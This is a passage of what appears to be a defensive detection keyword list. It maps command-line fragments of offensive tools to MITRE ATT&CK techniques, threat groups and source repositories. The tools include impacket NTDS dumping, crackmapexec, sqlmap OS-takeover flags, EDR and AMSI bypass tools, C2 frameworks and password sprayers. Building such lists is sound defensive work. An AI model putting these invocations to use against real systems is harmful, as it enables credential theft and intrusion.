nrpe-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* NtCr3at3Thr3adEx @ *,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,0,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -* -ntds *.dit *-system *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -ntds NTDS.dit -filters*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -* -ntds NTDS.dit -system SYSTEM -outputdir /*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -* -ntds ntds.dit.save -system system.save LOCAL*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --ntds-history*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --ntds-pwdLastSet*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -nthash * -domain-sid *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -nthash * -spn * -domain-sid * -domain *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* ntlm.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* ntlm.wordlist *--hex-wordlist*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,0,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -* --ntlm-proxy-ip * --ntlm-proxy-port *,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -* ntlmrecon*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,0,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -* NTLMv1 captured *,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -* ntlmv1.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --nt-offsets *.csv*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to 
bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -* ntp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ntp-monlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nuages.formatImplantLastSeen*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -* NuagesImplant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -* -o /share/payloads/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* -o cowroot*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/exrienz/DirtyCow,1,0,N/A,N/A,1,27,27,2018-07-23T02:07:24Z,2017-05-12T10:38:20Z -* -o ffuf.csv*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -* -oA icebreaker-scan*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential 
Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* --obfuscate *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* octopus.py*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -* -old-bloodhound*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* omp2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* omp2-enum-targets.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* omron-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --oneliner-nothidden*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* onesixtyone.c*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,0,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -* --only-abuse --dc-host *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --only-known-exploit-paths*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* openflow-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* openlookup-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* openvas-otp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* openwebnet-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-brute-stealth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-sid-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* oracle-tns-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --os-bof*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --os-cmd whoami*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --os-pwn*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --os-smbrelay*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --outdir ldapdomaindump *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - 
T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --output rootDSEs.json --dump*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -* ovs-agent-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* owa * --user-as-pass *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -* oxidfind -i *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* oxidfind -n *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* -p * --amsi-bypass *,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -p * -d *.dll -e OpenProcess*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,0,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -* -p *\mimi.out*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 
- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -p 1337:1337 -p 5000:5000*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 